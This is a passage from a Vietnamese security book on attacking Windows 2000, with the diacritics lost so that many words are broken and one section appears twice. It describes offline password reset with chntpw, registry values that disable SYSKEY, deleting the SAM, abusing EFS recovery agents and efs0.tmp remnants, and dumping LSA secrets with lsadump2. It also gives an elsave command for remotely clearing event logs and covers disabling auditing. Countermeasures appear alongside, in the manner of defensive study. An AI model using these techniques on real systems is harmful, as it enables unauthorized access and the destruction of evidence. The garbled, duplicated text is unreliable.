Petter tip tc mt m t v cung cp nhng cng c to lp mt a mn khi ng Linux c th s dng c khi ng li mt h thng NT/2000, thay i mt khu Administrator (thm ch mt khu ny c i tn), khi ng, v sau ng nhp vi mt mt khu mi. Sau y l mt s kt hp th v: Tnh nng nhp ch hot ng ngay c trong trng hp ng dng SYSKEY v tin hnh la chn bo v SYSKEY bng mt mt khu v lu trn mt a mm i mt giy, chng ti c bit rng : SYSKEY p dng vng m ha th hai 128 bit i vi nhng thng tin phn tch mt khu s dng mt kha duy nht c lu trong Registry, vn c bo v ty chn bng mt mt khu, hay c lu trong a mm (xem chng 5). Lm sao mt ngi c th cho nhng thng tin phn tch vo m khng bit kho h thng c dng to ra chng? Petter tm ra cch tt SYSKEY. Nghim trng hn, ng pht hin ra rng s khng phi thc hin iu - nhng thng tin phn tch kiu c nhp trong SAM s t ng chuyn i thnh dng SYSKEY ha ngay khi khi ng li h thng. Chng ta phi khm phc Peter v pht kin thit k i chiu ny. Ci u bi phc Peter! 1. Thit lp HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot v 0 lm v hiu ho SYSKEY (nhng gi tr c th p dng cho kho ny l 0 v hiu ho; v 1 kho cha c bo mt c lu trong Registry; 2 kho bo mt bng cm mt khu trong Registry; 3 kho c lu trong a mm.) 2. Thay i mt c hiu c t trong HKLM\SAM\Domains\Account\F cu trc nh phn sang mt hnh thc tng t nh SecureBoot trc y. Trong khi ton h thng ang hot ng, kho ny khng th tip cn m c. 3. Ch ring trong Windows 2000, kho <mc nh> trong HKLM\security\Policy\PolSecretEncryptionKey cn phi i sang gi tr tng t nh hai kho trc. Theo Petter, ch thay i mt trong hai gi tr u trong NT4 ln ti nhng gi tr SP6 s xy ra s khng nht qun gia SAM v nhng thit lp h thng khi khi ng kt thc,v SYSKEY c ti thit lp. Trong Windows 2000, s khng nht qun gia ba kho ny dng nh c thit lp li vi gi tr c th nht khi khi ng li.

CNH BO: S dng nhng k thut ny c th dn n SAM b h hi,

hoc khng dng c na. Khi nhng k thut ny khng khi ng li c

http://itlab.com.vn

na, chng ta mi th nghim chng trn phn ci t NT/2000. Ch khng nn chn Disable SYSKEY trong mc chntpw trong Windows 2000. Nhng phn ng cc k nguy hi c th sy ra khi thc hin k thut ny, v thng phi tin hnh ci t li t u. CH :K thut ny s khng thay i nhng mt khu chng mc i tng s dng trong trnh iu khin min c ci t Windows 2000 v n ch nhm vo file SAM hng. V DC, nhng thng tin phn tch mt khu c lu trong Th Mc ng, ch khng lu trong SAM. Bin Php i Ph pwdumpX Ci t DLL khng hot ng trong Windows s khng cn tr pwdump2 hoc pwdump3e. Tuy nhin pwdumpX cn c c quyn ca Administrator hot ng v n phi c chy trong mi trng mng cc b. Nu k tn cng dnh c li th ny, chng c th t c mc ch trn h thng cc b. (Tuy nhin s dng s liu t SAM tn cng h thng l mt vn khc). Nhp Thng tin vo SAM bng chntpw Tnh ph bin 8 Tnh n gin 10 Tnh hiu qu 10 Mc ri ro 9 Nu k tn cng truy nhp vt l vo mt h thng, chng c th thc hin c mt cuc tn cng tinh vi, c Petter Nordahl-Hagen gii thiu trn a ch http://home.eunet.no/~pnordahl/ntpasswd/. Trong hng lot trang lin kt trn a ch ny, Petter a ra mt s nhng dn chng gy ch , bao gm:
Nhng thng tin phn tch c th c a vo SAM ngoi tuyn, cho php bt c ai cng c th thay i mt khu ca ngi s dng h thng .

Petter tip tc mt m t v cung cp nhng cng c to lp mt a mm khi ng Linux c th s dng c khi ng li mt h thng NT/2000, thay i mt khu Administrator (thm ch mt khu ny c i tn), khi ng, v sau ng nhp vi mt mt khu mi. Sau y l mt s kt hp th v:

http://itlab.com.vn

Tnh nng nhp ch hot ng ngay c trong trng hp ng dng SYSKEY v tin hnh la chn bo v SYSKEY bng mt mt khu v lu trn mt a mm i mt giy, chng ti c bit rng : SYSKEY p dng vng m ha th hai 128 bit i vi nhng thng tin phn tch mt khu s dng mt kha duy nht c lu trong Registry, vn c bo v ty chn bng mt mt khu, hay c lu trong a mm (xem chng 5). Lm sao mt ngi c th cho nhng thng tin phn tch vo m khng bit kho h thng c dng to ra chng? Petter tm ra cch tt SYSKEY. Nghim trng hn, ng pht hin ra rng nhng thng tin phn tch kiu c nhp trong SAM s t ng chuyn i thnh dng SYSKEY ngay khi khi ng li h thng. Chng ta phi khm phc Peter v pht kin thit k i chiu ny. Xin ci u bi phc Peter! 4. Thit lp HKLM\System\CurrentControlSet\Control\Lsa\SecureBoot v 0 lm v hiu ho SYSKEY (nhng gi tr c th p dng cho kho ny l 0 v hiu ho; v 1 kho cha c bo mt c lu trong Registry; 2 kho bo mt bng cm mt khu trong Registry; 3 kho c lu trong a mm.) 5. Thay i mt c hiu c t trong HKLM\SAM\Domains\Account\F cu trc nh phn sang mt hnh thc tng t nh SecureBoot trc y. Trong khi ton h thng ang hot ng, kho ny khng th tip cn m c. 6. Ch ring trong Windows 2000, kho <mc nh> trong HKLM\security\Policy\PolSecretEncryptionKey cn phi i sang gi tr tng t nh hai kho trc. Theo Petter, ch thay i mt trong hai gi tr u trong NT4 ln ti nhng gi tr SP6 th s gy ra s khng nht qun gia SAM v nhng thit lp h thng khi qu trnh khi ng kt thc,v SYSKEY c ti thit lp. Trong Windows 2000, s khng nht qun gia ba kho ny dng nh c ti thit lp bng gi tr c th nht khi khi ng li. CNH BO: S dng nhng k thut ny c th khin SAM b h hi, hoc hng hon ton. Khi nhng k thut ny khng khi ng li c na, chng ta mi th nghim chng trn phn ci t NT/2000. Ch khng nn chn Disable SYSKEY trong mc chntpw trong Windows 2000. Nhng phn ng cc k nguy hi c th xy ra khi p dng k thut ny, v thng phi tin hnh ci t li t u. CH :K thut ny s khng thay i nhng mt khu chng mc i tng s dng trong trnh iu khin min c ci t Windows 2000 v n ch nhm vo file SAM hng. V DC, nhng thng tin phn tch mt khu c lu trong Th Mc ng, ch khng lu trong SAM.

http://itlab.com.vn

 Nhng Bin Php i Ph chntpw

Khi k tn cng thc hin c truy xut vt l khng hn ch ti mt h thng, chng ta vn c mt s bin php i ph tn cng kiu ny. Cng vic kho st u tin l thit lp SYSKEY to thnh s can thip cn thit vo qu trnh khi ng h thng bng cch nhp mt mt khu hoc mt kho h thng t a mm (xem chng 5 bit thm chi tit v ba hnh thc ca SYSKEY). V vy, ngay c khi k tn cng mun thit lp li mt khu Administrator th vn phi nhp mt khu SYSKEY khi ng h thng. Tt nhin, k tn cng vn c th s dng chntpw v hiu ha ton b SYSKEY, nhng chng c th gy hng h thng mc tiu nu l Windows 2000.

Gi s Petter v hiu ho ton b SYSKEY, la chn duy nht vi h nh phn chntpwiu g s xy ra nu n c thit lp v 1 thay v v 0, lu kho h thng trong mng cc b. iu ny c th v hiu ho ch bo v SYSKEY dng password-hoc ploppy, lm bin php i ph ny tr nn v dng. B m gc cho chntpw c trn trang Web ca Petter v cch thc s dng hiu qu chntpw trong ch hiu chnh Registry cng c gii thiu trn cng a ch ny. Nu khng c ch bo mt ca SYSKEY dng password hoc ploppy, bn phi da vo nhng th thut bo mt c, nh m bo nhng h thng quan trng phi c bo mt vt l v thit lp mt m BIOS hoc v hiu ha nhng truy xut t a mm ln h thng. XA SAM TRNG V MT KHU ADMINISTRATOR Tnh ph bin 4 Tnh n gin 5 Tnh hiu qu 10 Mc ri ro 6 Vo ngy 25/7/1999, James J. Grace v Thomas S. V. Bartlett III cng b mt ti liu gy ch m t cch thc xo mt khu Administrator nh khi ng mt h iu hnh thay th v xo file SAM (xem ti trang http://www.deepquest.pf/win32/win2k_efs.txt). Nu cn truy nhp vt l khng qua kim sot v cc tnh nng sn c ca cc cng c vit cc mc NTFS (v d, NTFSDOS Pro c ti http:// www.sysinternals.com), th k thut ny c bn s nghim nhin i qua h thng an ninh cc b trn NT/2000. Mc d k thut c gii thiu ny cp n s ci t ca mt bn sao th hai ca NT hoc 2000 cng vi mt bn gc, nhng vic lm ny khng thc s cn thit nu k tn cng ch mun ph hng mt khu chng mc ca Administrator. Lc SAM c xo mt cch d dng. Cch thc tn cng ny c th dn n mt s tc hi nghim trng n Encrypting File System (H Thng File m ho), s c gii thiu chi tit phn sau.

http://itlab.com.vn

CH Nhng trnh iu khin min Windows 2000 khng b nh hng khi SAM b xo v chng khng lu gi nhng thng tin phn tch mt khu trong SAM. Tuy nhin, nhng phn tch ca Grace v Bartlett ch ra mt c ch dnh c kt qu cn thit tng t trn nhng trnh iu khin min nh ci t mt bn sao Windows 2000. Ngng qu trnh Xo SAM Ngoi Tuyn Nh chng ta bit, phng php duy nht bc u gim thiu hu qu do cuc tn cng kiu ny l nh cu hnh cho Windows 2000 khi chy trong SYSKEY ch password hoc ploppy. Mt s cch hiu qu khc ngn cn tn cng mt khu ngoi tuyn l gi cho my ch c bo mt vt l, di di hay lm v hiu ho nhng a khi ng, hoc xy dng li mt mt khu trong BIOS nhp vo trc khi khi ng li h thng. Chng ti khuyn cc bn nn s dng tt c nhng c ch ny. H Thng File M Ha (EFS) Mt trong nhng trng im ca vn bo mt trong Windows 2000 l H Thng M Ho File (EFS). EFS l mt h thng da trn c cu kho bo mt chung nhm m ha d liu trn a ti mt thi im nht nh vi mc ch ngn chn tin tc tip cn h thng. Hng Microsoft tung ra mt b ti liu cung cp thng tin chi tit v c ch hot ng ca EFS. White paper ny c gii thiu trn a ch http://www.microsoft.com/windows2000/techinfo/howitworks/security/encryp t.asp. EFS c th m ho mt file hay th mc vi mt c ch thut ton m ho, i xng, v nhanh chng s dng mt kho m ho file (FEK) c to ra ngu nhin c trng cho file hay th mc. Phin bn EFS u tin s dng Tiu Chun M Ho D Liu M Rng (DESX) nh mt thut ton m ho. Kha m ho file c to ra ngu nhin sau li t ng m ho vi mt hay nhiu kho m ho dng chung, bao gm kho ca i tng s dng (mi i tng s dng Windows 2000 u nhn c mt mt khu dng chung/c nhn) v mt tc nhn phc hi mt khu (RA). Nhng gi tr c m ho c lu di dng thuc tnh ca file. V d tc nhn phc hi mt khu c kch hot trong trng hp ngi s dng m ho mt s d liu nhy cm b mt h thng hay nhng mt khu m ho ca h b mt. trnh trng hp mt d liu m ho khng th phc hi c, Windows 2000 to ra mt tc nhn phc hi d liu cho EFSEFS s khng hot ng nu khng c mt tc nhn phc hi. Mt tc nhn phc hi c th m ho ni dung file m khng cn mt khu c nhn ca i tng s dng v FEK c lp hon ton vi mt khu dng chung hay c nhn ca i tng s dng. Tc nhn phc hi d liu mc nh cho mt h thng l chng mc administrator cc b.

http://itlab.com.vn

Mc d EFS c th rt hu hiu trong nhiu trng hp, nhng n khng pht huy tc dng nu lm vic vi nhng i tng s dng cng mt Workstation nhm bo v file. chnh l tnh nng hot ng ca danh sch iu khin truy cp (ACL) h thng file NTFS. Microsoft t EFS vo mt v tr nh mt tng bo v chng li nhng cuc tn cng nhng v tr NTFS b hng. V d, bng cch khi ng nhng H iu Hnh thay th v s dng nhng cng c thuc nhm ba truy cp vo a cng, hay nhng file lu trong my ch t xa. Thc ra, b ti liu ca Microsoft v EFS tp trung vo ch EFS c th gii quyt nhng vn bo mt da trn cc cng c c trn cc h iu hnh khc. Nhng h iu hnh ny cho php i tng s dng truy cp vt l cc file t mt mc NTFS m khng cn c s kim tra truy cp. Chng ta s tm hiu r vn ny phn sau.

Chc nng ca H thng bo mt tp tin EFS

H thng m ho tp EFS c th c dng bo mt tp hay th mc trn mn hnh Properties bng cch s dng phm Tab, nhn Advanced. Ngoi ra cng c lp m dng lnh c th cn c s dng lp m v gii m file. nh dng lnh: Type cipher /? vo du nhc h thng. Mc d cc tp c th c mt khu ring, nhng h thng bo mt EFS ca hng Microsoft cn cung cp thm bin php bo mt ngay trn th mc. L do l i khi mt m lp ti file khng c tc dng v c to ra dng vn bn thun tu, hn na tp tin ny khng cho php nn.
Nh c s tr gip ca Windows 2000 i vi EFS, bn s c c nhng k nng cn thit s dng H thng EFS tt hn.

Ch : Cn thn trng khi dng lnh cut di chuyn tp c m

ho. Mc d c ch sao lu chun (v d nh: ntbackup.exe) s thc hin sao lu bn chnh, nhng lnh sao chp thng thng li ch c nhng thng s tp gc di hnh thc gii m. Nu im ch ca tp c di chuyn khng phi l khu vc lu tr NTFS 5.0, th tp tin c di chuyn ny s dng vn bn thun tu. Nu im ch ca tp c di chuyn l khu vc lu tr NTFS 5.0, th tp tin ny vn c gi nguyn m bo mt nhng s khc nguyn bn. Tp tin s c gi nguyn nu dng mt kho bo mt (FEK) mi. Cn lu rng H thng bo mt tin EFS ch bo mt tp tin khi tp c lu trn a, tp s khng c kho m nu post ln mng.

V hiu ha kha khi phc EFS

http://itlab.com.vn

Tnh 3 Tnh 1 Tnh 10 Mc 5

ph n hiu r i

bin gin qu ro

Chng ta tip tc nghin cu ti liu m Grace v Bartlet gii thiu phn trc ti a ch http://www.deepquest.pf/win32/win2k_efs.txt , kh nng ghi chn d liu ln m chng mc Administrator c thc hin trn mt phm vi rng hn khi my ngm hiu Administrator l mt tc nhn phc hi m mc nh (RA). Khi t nhp thnh cng vo mt h thng bng mt mt m Administrator trng, cc tp tin c m ho di dng EFS s t ng gii m khi m tp tin, t c th dng chnh mt khu khi phc m truy cp cc tp b m ho. V sao chc nng ny hot ng? Hy nh li cch thc hot ng ca h thng m ho tp: Mt khu m ho tp (cng dng gii m tp) c thit lp ngu nhin cng c th t lp m bng nhng phm khc, v nhng bin s m ho ny c lu tr nh nhng thuc tnh tp. FEK c lp m bng nhng kho chung ca khch hng (mi khch hng s dng h iu hnh Windows 2000 s nhn c mt mt khu c nhn hay mt khu dng chung) c lu di dng thuc tnh tp gi l Trng Gii M D Liu (DDF) c kt hp vi tp tin. Khi ngi dng truy cp vo tp tin ny, m cc nhn ca ngi y s gii m DDF, v s tm c FEK gii m tp tin . Nhng bin s thu c t vic gii m FEK cng vi m tc nhn phc hi s c lu di dng thuc tnh c tn Trng Phc Hi D Liu (DRF). V vy, nu Administrator cc b l tc nhn phc hi xc nh (thng mc nh), th bt k ai c m Administrator trong h thng ny s c th gii m DRF bng mt khu c nhn ca mnh ri gii lun c m FEK, y chnh l cha kho gii m cc tp tin c bo mt di dng EFS. Xa y nhim Tc nhn Phc hi Hy xem iu g xy ra nu tc nhn phc hi c giao cho ngi khc m khng phi l Administrator? Grace v Bartlett s cung cp cho cc bn bin php i ph bng mt chng trnh chy ngay khi khi ng my v xc lp li mt m cho bt k mt chng mc no c xc nh l tc nhn phc hi. Tt nhin mt k t nhp khng cn ch tp chung vo tc nhn phc hi v n ch nht thi to ra mt phng thc d tip cn nht i vi cc tp b m ho trn a.Mt cch khc trnh xung t vi tc nhn phc hi c u thc l gi dng lm ngi m ho tp . S dng chntpw (xem phn trc), mi m chng mc ca ngi s dng u c th xc lp li

http://itlab.com.vn

bng hnh thc tn cng ngoi tuyn. Khi k tn cng c th t nhp vo h thng khi ngi s dng m ho DDF c lin kt o vi m c nhn ca ngi , sau gii m FEK v tp tin. Chng ta cng khng cn dng n m c nhn ca tc nhn phc hi d liu. Xut khu cc kha phc hi v lu tr an ton cc kha ny Grace v Bartlett s buc h thng Microsoft phi cho php m EFS c gii, nhng t nhp lm gim nguy c ri do bng cch xc nhn cuc tn cng s tht bi nu th thut chuyn giao m phc hi b pht hin. (Xem trang: http:// www.microsoft.com/ technet/treeview/default.asp?url=/technet/itsolutions/security/topics/efs/asp ). Tuy vy phn m t qu trnh x l d liu ca hng Microsoft trong trang ny qu lc hu, v cc tp tin tr gip EFS c th khng th ch ra cch thc thc hin. truy xut cc tp cha tc nhn phc hi trn nhng h thng c lp, m trang Group Policy (gpedit.msc), tm ti nhn Computer Configuration\Windows Settings\Security Setting\Public Key Policies\Encryted Data Recovery Agents, tch chut phi vo tc nhn phc hi bn phi ( thng y l Administrator), v chn All Tasks/Export. Xem bng sau:

Mt thut s s c m ra v qua hng lot mc thng tin trc khi truy xut c mt m. sao lu m tc nhn phc hi, bn phi truy xut c m c nhn km theo trang cha m, v bn nn to lp mt h thng bo v nghim ngt (i hi mt mt khu). Cui cng bn nn XO B M C NHN NU THNH CNG. Bc cui cng l v hiu ho kho gii m tc nhn phc hi thu c t h thng cc b. CNH BO: Ch xo ton b trang cha tc nhn phc hi trong phi ca thut s. iu ny s lm cho EFS trong Windows 2000 khng cn l tc nhn phc hi na. Hng dn sau y s cho thy iu g xy ra khi EFS c dng nhng khng c m tc nhn phc hi_N khng hot ng c.

http://itlab.com.vn

CH Nhng mc b kho m trc khi xo tc nhn phc hi vn b m ho, nhng chng s ch c khi ngi s dng khi phc c m RA lu t trc. i vi nhng my kt ni mng min, cch thc c hi khc: my ch min ny s lu tr tt c m phc hi h thng cho cc my trong min. Khi mt my dng Windows 2000 kt mng min, H Thng Qun L M Phc Hi Mc nh Trong Min s t ng lm vic. Administrator ca min , ch khng phi l Administrator cc b, s tr thnh tc nhn phc hi. T Administrator s phn tch cc m phc hi t nhng d liu m ho khin mi cuc tn cng ca Grace v Bartlett tr nn kh khn hn. cng l mt th thut truy xut trang cha tc nhn phc hi t my ch min . Nu nh cc tc nhn ny b l tn thng, th mi h thng trong min cng rt d b nh hng nu nh m phc hi c cc my cc b. CH Hng Microsoft cng xc nhn trong mt trang analefs rng vn xa b SAM, lm cho mt khu ca Administrator b xc lp li thnh gi tr trng, c th gii quyt nh SYSKEY. Chng ti chng minh iu ny hon ton khng ng tr phi m SYSKEY hoc ch cn a mm c ti xc lp. (Trong trang ny chng ta khng cp n iu .)

Phc Hi D Liu Tp Tm Thi EFS

Tnh 8 Tnh 10 Tnh 10 Mc 9 n hiu r i gin qu ro ph bin

Vo ngy 19-1-2001, Richard Berglind ng ti mt nghin cu rt th v ln trang danh sch th bo mt. S vic l ch khi mt tp tin c chn m ho bng EFS, nhng cui cng n vn cha c bo mt. Thc ra mt bn sao lu ca tp tin c chuyn ti mt th mc tm thi v c i tn thnh efs0.tmp. Sau nhng d liu t tp tin ny c m ho

http://itlab.com.vn

v thay th cho tp tin gc. Tp tin sao lu s t ng xo sau khi kt thc qu trnh m ho. Tuy nhin, sau khi tp tin sao lu thay th tp tin gc v tp tin tm thi c xa b, nhng khi cn vt l trong h thng tp tin, ni cc tp tin tm thi thng tr khng bao gi b xo sch. Nhng khi ny cha d liu gc cha m ho. Phng thc xo tp tin tm thi cng tng t nh cch xo bt k mt tp tin no khc. Mt mc nhp trong bng tp tin ch c nh du rng v cc lin cung ni lu tr cc tp c nh du hin th, nhng tp tin vt l v thng tin n cha ng s dng vn bn gc c lu trn mt a vt l. Khi cc tp tin mi c b xung vo vng lu trn a, cc thng tin ca tp s dn b ghi chn; nhng nu tp tin c m ho qu ln, th tp tin ny vn c lu ti hng thng sau (tu thuc vo dung lng a). Tr li vi nghin cu ca Richard, hng Microsoft khng nh trng hp ny l do thit k c trng cho tp c nhn dng EFS bo mt, v ch ra nhng khong trng ca EFS s gii thch mi vn r rng. Hng cng gi mt s th thut nhm trnh nhng trng hp nh trn v rng s nghin cu k hn vn ny. Cch thc hot ng ca chng trnh ny khi c cc d liu b m ho di dng EFS nh th no? Mt trnh duyt cp thp s truy xut d liu mt cch d dng, v d nh trnh duyt dskprobe.exe ca Cng c h tr c trn CD ci t Windows 2000. Trnh duyt ny cho php ngi s dng c th d dng truy cp my ch v truy xut d liu tp tin b m ho. Chng ta s tm hiu cch s dng trnh duyt dskprobe c tp tin efs0.tmp sau y. u tin, chy chng trnh dskprobe v m mt a vt l thch hp truy xut d liu bng cch chn Drives/Physical Drive v click chut phi vo mt thch hp trong phn trn, gc tri ca s hin th. Sau , click vo nhn Set Active gn bn chn sau khi hin th trong phn Handle 0 ca hp thoi. Sau khi hon thnh bc th nht, k tip bc th hai bn phi nh v cung thch hp cha nhng d liu mun nhn dng. nh v cc tp trn mt a vt l l mt cng vic cc k kh khn, tuy nhin bn c th s dng lnh Tools/Search Sectors ca trnh duyt dskprobe h tr cng vic tm kim ny. Trong v d hnh 6-3, chng ta tm kim chui k t efs0.tmp trong cc phn cung t 0 n im kt ca a. Bn cng nn click chn mc Exhaustive Search, cc kiu ch in hoa hay in thng (Ignore Case), v kiu ch Unicode. (S dng ASCII thng khng cho kt qu). Bc ba khi hot ng tm kim kt thc, nu EFS c s dng lp m tp trn a ang c phn tch, v nu tp efs0.tmp khng b ghi do cc thao tc hot ng ca a, th y ni dung tm kim s hin th trn giao din dskprobe. Cng vic tm kim chui k t efs0.tmp s th

http://itlab.com.vn

hin cc phn khc trn a cng cha chui k t . (mt tp c tn efs0.log cng cha tham chiu ng dn y ti tp efs0.tmp). Mt cch khc nhm gip bn tm lun thy chui efs0.tmp thay v tm tp cha chui l tm lun chui FILE trn dng u ca giao din dskprobe __my s ch ra phn cha mt tp . C efs0.log v efs0.tmp dng nh c to ra t cng mt ng dn ging vi ng dn ca tp c m ho, nhng chng khng hin th trn mt giao din chun m ch hin th trn giao din ca dskprobe. Trong hnh 6-3, chng ti ch ra mt tp efs0.tmp mu c pht hin trong cung t 21249 hin th trong dskprobe vi n dung y . (Mt ln na, cn lu chui FILE* dng u, y l mt tp tin).

CH K tn cng c th chy chng trnh dskprobe trn mng thng qua mt giao din iu khin t xa hay mt phin Terminal Server, ch khng ch t mt bn giao tip vt l. Khi tn cng bng mt trnh duyt cp thp khng nhng k tn cng khng ch n gin xo phn SAM hoc thay i cht t mi th c trong , m phi d tm nhng tp ang c bo mt di dng EFS trong nhng mi trng d b tn cng. Kha tnh nng Phc hi file tm lu EFS Khi cun sch n tay bn c, hng Microsoft vn cha c nhng bin php sa cha li ny. Tuy nhin, hng cng c nhng phn hi i vi Bugtraq cp phn trc. Microsoft cho bit, tp sao lu vn bn thun tu ch c to ra nu mt tp n c trc c m ho. Nu tp c to ra trong th mc c m ho th ngay lp tc n cng c m ho, v s khng c mt tp sao lu vn bn thun tu khc c to ra. Microsoft khuyn co iu ny nh mt quy trnh u i cho vic s dng EFS bo mt cc d liu nhy cm nh trnh by trong phn Bo Mt H Thng Tp Trong Windows 2000. (Xem http://www.microsoftft.com/technet/treeview/default.asp?url=TechNet/prodte chnol/windows2000serv/deploy/confeat/nt5efs.asp):

http://itlab.com.vn

Chng ti khuyn co cc bn tt hn ht l lun khi to mt th mc rng tin hnh m ho, sau to cc tp trc tip trong th mc . iu ny s m bo cc bit ca tp khng b lu gi bt k ni u trn a. Vic lm ny cng to ra mt s thc thi tt hn khi EFS khng cn to mt bn sao lu khc v sau li xo n im cn lu : thay v m ho cc tp ring bit, hy m ho mt th mc cha tt c d liu bo mt trc, v sau to cc tp nhy cm ch trong th mc ny. Khai Thc S U Thc Mt trong nhng k nng hiu qu m nhng k tn cng hay dng l tm nhng my u thc trong min (i khng cc b) m u hp l trong cc min hin thi khc. iu ny cho php k tn cng c th nhy cc t cc my ch c lp sang cc mch iu khin min v qua cc ng bin an ninh rt d dng. Chnh nhng nh qun tr h thng l ngi cho php k tn cng s dng cch ny khi h nhp vo mt hp c lp vi nhng my u thc khc trong min iu khin. H iu hnh Windows 2000 bo v c ai trong nhng li nh vy! Nhng b mt LSA Alive v Well Tnh ph bin 8 Tnh n gin 10 Tnh hiu qu 10 Mc ri ro 9 Nh trnh by Chng 5, yu im ca B mt LSA l cha kho cho vic li dng mi quan h tn nhim bn ngoi v n tit l danh sch mt vi ngi s dng cui cng truy cp vo h thng v cc mt khu truy cp vo cc chng mc dch v. Mc d hng Microsoft a ra mt bin php khc phc cho li B mt LSA sau khi tung ra Service Pack 3, nhng rt nhiu d nhy cm vn c th b ly cp nh s tin ch lsadump2 t Todd Sabin(xem http://razor.bindview.com/tools/desc/lsadump2 _readme.html) Sau y l mt v d khi lsadump2 khai thc mt chng mc dch t mt mch iu khin min dng Windows 2000. Mc vo cui cng cho thy dch v BckpSvr nhp vo h thng vi mt khu ca password1234.

http://itlab.com.vn

C:\>lsadump2 $MACHINE.ACC 7D 58 DA 95 69 3E 3E 9E AC C1 B8 09 F1 06 C4 9E }x..i>>.. 6A BE DA 2D F7 94 B4 90 B2 39 D7 77 j..-..9.w TermServLicentingSignKey-12d4b7c8-77d5-11d5-11d1-8c24-00c04fa3080d . . . TS: InternetConnectiorPswd 36 00 36 2B 00 32 00 48 00 68 00 32 00 62 00 6.6.+ 2.H.h.2.b. 44 00 55 00 41 00 44 00 47 00 50 00 00 00 D..A.D.G.P . . . SCBckpSvr 74 00 65 00 73 00 74 00 75 00 73 00 53 00 72 00 p.a.s.s.w.o.r.d. 31 00 32 00 33 00 34 00 1.2.3.4. Khi bit c mt khu dch v, k tn cng c th s dng nhng tin ch tin ch nh net user c ci t sn v Resource Kit nlnest/TRUSTED_DOMAINS theo di trng mc i tng s dng v mi quan h tn nhim trn cng h thng ny (d dng thc hin nu c c quyn ca Administrator). Khm ph ny c th to ra mt i tng s dng c tn bckp (hoc tng t) v mt hoc nhiu mi quan h vi nhng min ngoi. Chng ta s c c hi thnh cng cao nu s dng bkcp/password 1234 ng nhp vo nhng min ny.

Bin Php i Ph Isadump2

Hng Microsoft khng coi y l mt l hng an ninh v mun chy Isadump2 cn phi c SeDebugPrivilege, m SeDebugPrivilege ch c gi n Administrator thng qua mt ch mc nh. Cch tt nht chng li Isadump2 l bo v cc chng mc ca Administrator khi b tn thng ngay t u. Tuy nhin, nu trng hp xu nht xy ra v Administrator b mt, th cc chng mc dch v t cc min ngoi tr vn c th b ly cp nh s dng cng c Isadump2, v khi bn khng th lm g c. Hnh Thc Sao Multimaster v M Hnh Trust Mi

http://itlab.com.vn

Mt trong nhng thay i c bn i vi cu trc min NT4 trong Windows 2000 l bc chuyn t hnh thc sao master n v m hnh trust sang hnh thc multimaster. Trong cu trc Windows 2000, tt c cc min u sao chp Active Directory dng chung v u thc ln nhau bng trust chuyn tip hai chiu nh chy Kerberos. (Trust gia cc forest hay vi min NT4 vn l mt chiu) . y chnh l mt gii php tt cho thit k cu trc lin kt min. Kh nng u tin ca hu ht cc Administrator min l to ra nhng forest tch ri cho ngoi vi bo mt trong h thng. iu ny hon ton sai im mu cht ca AD l hp nht cc min thnh mt lc qun l thng nht. Hng lot s kim sot truy sut c th c duy tr qua cc i tng trong forest nh n s lm cc Administrator bi ri do mt lot cc thit lp php m hng Microsoft t ra. Nhng mc Directory (Organizational Unt [OUs] ) v tnh nng delegation (y quyn)mi s c nh hng ln v mt ny. Tuy nhin, vi m hnh mi ny, cc thnh vin thuc Universal Groups (v d: doanh nghip), v cp thp hn, Domain Global Groups (v d: Admin min) s c th tip cn tt c cc min trong forest. V vy, mt chng mc b tn thng trong nhm ngoi vi ny s c th nh hng sang cc min khc trong mt forest. Do vy, chng ti khuyn co cc bn nn t nhng i tng ln hn (i tng ny phi khng phi hon ton ng tin cy [v d , mt cu trc tng ng] hay khng b tn thng do nhng tc ng ngoi cnh [v d: Mt trung tm lu tr d liu mng]) trong forest, hoc bn nn thao tc hon ton nh nhng my ch c lp. Ngoi ra, vi trust chuyn tip hai chiu, nhm Authenticated Users s m nhim tng th phm vi mi. Trong nhng cng ty ln, cn phi xem y l mt nhm khng ng tin cy. LP RNH GHI Nhng k thut v cng c c dng che giu nhng rnh ghi vn hot ng tt (hu nh i vi tt c cc phn) trong Windows 2000. Song nhng k thut v cng c ny vn cn c nhng im khng tng ng c ch ra sau y. V Hiu Ho Tnh nng kim tra Tnh nng kim tra c th hot ng da trn Chnh Sch An Ninh Cc B (secpol.msc) ti \Local Policy\Audit Policy, hay cng c Group Policy (gpedit.msc) ti \Computer Configuration\Windows Settings\Security Settings\Local Policy\Audit Policy. Chng ta s tip tc tm hiu Group Policy cui chng ny. Thit lp kim tra vn c gi nguyn nh trong NT4. Trong Windows 2000 khng c bn ghi tp trung tt c cc bn ghi s c lu tr trong h thng cc b, y chnh l mt im rc ri so vi

http://itlab.com.vn

syslog ca UNIX. V tt nhin Windows 2000 t chi lu cc a ch Internet kt ni t xa cho cc s kin nh ng nhp tht bi. Nhng dng nh mt s mc vn khng h thay i. Ngoi giao din cu hnh kim ton Group Policy, tin ch auditpol t NTRK vn hot ng chnh xc nh tm hiu k trong Chng 5. Tin ch auditpol c th kch hot hay v hiu ho vic kim ton. Khng ai c th d on c tng lai s ra sao nu khng c NTRK? Xo Bn Ghi S kin Tt nhin chng ta vn c th xo c Bn ghi s vic trong (Event Log) Windows 2000, nhng nhng bn ghi vn b truy xut thng qua mt giao din mi. Hng lot Event Log vn c lu trong h thng qun l my tnh MMC ti \System tools\Event Viewer. Bn cnh ba bng ghi mi c hin hu l: Directory Service, DNS server, v File Replication Service. Nhp chut phi vo bt k mt bn ghi no s cho ra trnh n cha mt mc nhp Clear All Events. Tin ch elsave trong chng 5 s thc hin xa tt c cc bn ghi t xa (k c nhng bn mi nht). Trong v d sau y, c php lnh s dng elsave xo bn ghi File Replication Service trong my ch joel. (Cn c nhng c quyn chnh xc trong h thng t xa ny). C:\>elsave s \\joel -1 File Repllication Service -C Mt th thut khc chy nh Administrator trong mt my ch b tn thng l khi ng mt cu lnh di hnh thc chng mc SYSTEM. Th thut ny c th d dng thc hin c nh s dng chng trnh lp biu AT. Khi trnh tin ch c bt ln, m Event Log MMC (compmgmt.msc) v xo nhng bn ghi ny. Mc d mt mc nhp vn ch ra nhng bn ghi ny b xo, song chng mc ca i tng s dng c chc nng xo nhng bn ghi ny s c ch ra nh SYSTEM.

n file
Mt thao tc quan trng ngay sau khi t nhp thnh cng s xo sch du vt t nhp tinh vi ca k tn cng. Chng ta tm hiu hai cch n file Chng 5: lnh attrib v chui tp tin. Attrib Attrib s n file, nhng nhng file ny vn hin th khi dng lnh Show All Files p dng cho cc th mc.

http://itlab.com.vn

Phn lung
